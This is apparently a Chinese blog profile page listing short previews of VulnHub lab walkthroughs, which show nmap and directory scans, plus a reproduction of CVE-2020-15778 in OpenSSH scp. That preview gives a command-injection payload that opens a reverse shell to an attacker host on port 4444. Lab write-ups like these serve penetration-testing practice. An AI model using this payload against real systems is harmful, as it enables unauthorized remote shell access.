2 臭nana

尚未进行身份认证

我要认证

暂无相关简介

等级
TA的排名 8w+

vulnhub靶机-Mrr3b0t

程序员节,写篇文章意思意思,这个靶机比较考脑洞,前面还有一个隐写的技巧(用到的网站挺好的),适合打ctf的人做由于ip获取不对,所1、找到靶机ip:192.168.43.201nmap -sn 192.168.43.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.43.201Starting Nmap 7.80 ( https://nmap.org )Stats: 0:00:52 elapsed; 0 hosts completed

2020-10-24 11:49:33

vulnhub靶机-FIRSTBLOOD: 1

绪论:这个靶机比较简单,因为每一步都有提示,而且基本命令都给出来了1、找到靶机ip:192.168.74.130nmap -sn 192.168.74.0/242、扫描靶机端口,得到80端口和60022端口(ssh服务)root@kali:~# nmap -A -p- 192.168.74.130Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.74.130Host is up (0.000

2020-09-25 16:26:53

vulnhub靶机-So Simple: 1

1、靶机开机即得ip地址:192.168.8.1092、扫描靶机端口root@kali:~# nmap -A -p- 192.168.8.109Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for so-simple (192.168.8.109)Host is up (0.00056s latency).Not shown: 65532 closed portsPORT STATE SERVICE VERSION

2020-08-10 20:37:11

vulnhub靶机-Photographer: 1

1、找到靶机ip:192.168.8.168nmap -sn 192.168.8.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.8.168Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for photographer (192.168.8.168)Host is up (0.00051s latency).Not shown: 65531 closed portsPOR

2020-08-09 21:54:30

CVE-2020-15778漏洞复现

产品:Openssh影响的组件:SCP漏洞版本:<= openssh-8.3p1scp命令引发的命令注入反弹shell的payloadscp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt'实战测试,这里使用本机进行测试1、查看ssh版本,符合漏洞版本ssh -V2、先在本地新建好文件,用于上传2、本地开启监听3、使用s.

2020-08-04 20:17:49

vulnhub靶机-CyberSploit: 2

1、找到靶机ip:192.168.0.131nmap -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -p- -A 192.168.0.130Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.130Host is up (0.00070s latency).Not shown: 65533 closed portsPORT STATE SERV

2020-07-20 22:14:29

vulnhub靶机-CyberSploit: 1

这个系列的靶机解密部分有点像ctf的杂项,两个靶机都比较简单1、找到靶机ip:192.168.0.130nmap -sn 192.168.0.0/242、扫描靶机端口3、访问80端口,动图还不错,F12查看源码发现一个用户名itsskv4、手动尝试一下robots.txt文件,发现一串密文,base64解密得到flag1root@kali:~# echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1..

2020-07-20 21:34:37

vulnhub靶机-sunset:decoy

1、找到靶机ip:192.168.0.129nmap -sn 192.168.0.0/242、扫描靶机端口,除了22、80是开放状态,其他几个都是过滤状态root@kali:~# nmap -p- -A 192.168.0.129Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.129Host is up (0.0057s latency).Not shown: 65528 closed p

2020-07-20 16:22:45

vulnhub靶机-sunset:sunrise

1、找到靶机ip:192.168.0.128nma -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -p- -A 192.168.0.128Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.128Host is up (0.00044s latency).Not shown: 65531 closed portsPORT STATE SERVIC

2020-07-19 18:21:47

vulnhub靶机-sunset:dusk

1、获取靶机ip:192.168.0.127nmap -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -p- -A 192.168.0.127Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.127Host is up (0.00097s latency).Not shown: 65529 closed portsPORT STATE SER

2020-07-18 18:56:47

vulnhub靶机-sunset:nightfall

1、找到靶机ip:192.168.0.125nmap -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.0.125Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.125Host is up (0.0018s latency).Not shown: 65529 closed portsPORT STATE SERV

2020-07-17 22:31:18

vulnhub靶机-sunset:dawn

1、找到靶机ip:192.168.0.123nmap 192.168.0.0/24 2、扫描靶机端口root@kali:~# nmap -A -p- 192.168.0.123Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.123Host is up (0.0090s latency).Not shown: 65531 closed portsPORT STATE SERV

2020-07-16 20:45:33

vulnhub靶机-sunset:1

这个靶机比较容易,水一篇,后面接着写这个sunset系列1、找到靶机ip:192.168.0.122nmap -sn 192.168.0.0/242、扫描靶机端口oot@kali:~# nmap -sn 192.168.0.0/24Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.1Host is up (0.0016s latency).MAC Address: 8C:21:0A:BC

2020-07-15 17:57:14

vulnhub靶机-Pwned

有这么久没写了,这次就写一下目前vulnhub最新出的靶机Pwned,目的是拿到3个flag,难度是easy,但是较我以往的博客多了一种提权方式1、寻找靶机地址:192.168.0.118nmap -sn 192.168.0.0/242、扫描靶机开放端口root@kali:~# nmap -p- -A 192.168.0.118Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.118.

2020-07-14 17:08:25

vulnhub靶机-djinn3

1、靶机ip:192.168.0.110(开机就提示:不是所有的都需要扫描发现主机)2、扫描靶机端口root@kali:~# nmap -A -p- 192.168.0.110Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.110Host is up (0.0011s latency).Not shown: 65531 closed portsPORT STATE SERVICE V

2020-07-01 19:22:02

vulnhub靶机-djinn2

1、靶机开机后得到ip:192.168.0.1072、扫描靶机端口,比上一个靶机多了个5000端口2122133750007331root@kali:~/桌面# nmap -p- -A 192.168.0.107Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-28 21:53 CSTNmap scan report for 192.168.0.107Host is up (0.00100s latency).Not s

2020-06-29 10:55:35

vulnhub靶机-djinn

1、找到靶机ip:192.168.0.108

2020-06-27 18:17:21

vulnhub靶机-cengbox2

vulnhub靶机-cengbox2

2020-06-25 20:01:35

vulnhub靶机-cengbox

1、使用netdiscover扫描一下靶机ip:192.168.0.1072、nmap扫描一下目标开放端口:22、803、访问80端口,没什么有用的信息,直接用kali自带的dirb扫描目录dirb http://192.168.0.107 /usr/share/wordlists/dirb/big.txt4、看着masteradmin和uploads两个目录有点可疑,猜测masteradmin应该是管理后台,uploads应该是个保存上传文件的目录,应该是需要上传文件,两个直

2020-06-23 20:56:01

vulnhub靶机-GitRoot

1、先找下ip,再扫描下端口2、浏览器访问80端口3、修改hosts文件(windows路径C:\Windows\System32\drivers\etc,linux路径/etc)添加一行gitroot.vuln 192.168.0.1064、使用gobuster扫描一下子域名gobuster vhost -u gitroot.vuln -w domain.txt5、wp是个WordPress站点,repo存在git源码泄露6、直接找到工具把源码全部下载

2020-06-22 23:30:37

查看更多

勋章 我的勋章
  • 签到王者
    签到王者
    累计签到获取,不积跬步,无以至千里,继续坚持!
  • 阅读者勋章Lv3
    阅读者勋章Lv3
    授予在CSDN APP累计阅读博文达到30天的你,是你的坚持与努力,使你超越了昨天的自己。
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 1024勋章
    1024勋章
    #1024程序员节#活动勋章,当日发布原创博客即可获得
  • 勤写标兵Lv2
    勤写标兵Lv2
    授予每个自然周发布4篇到6篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。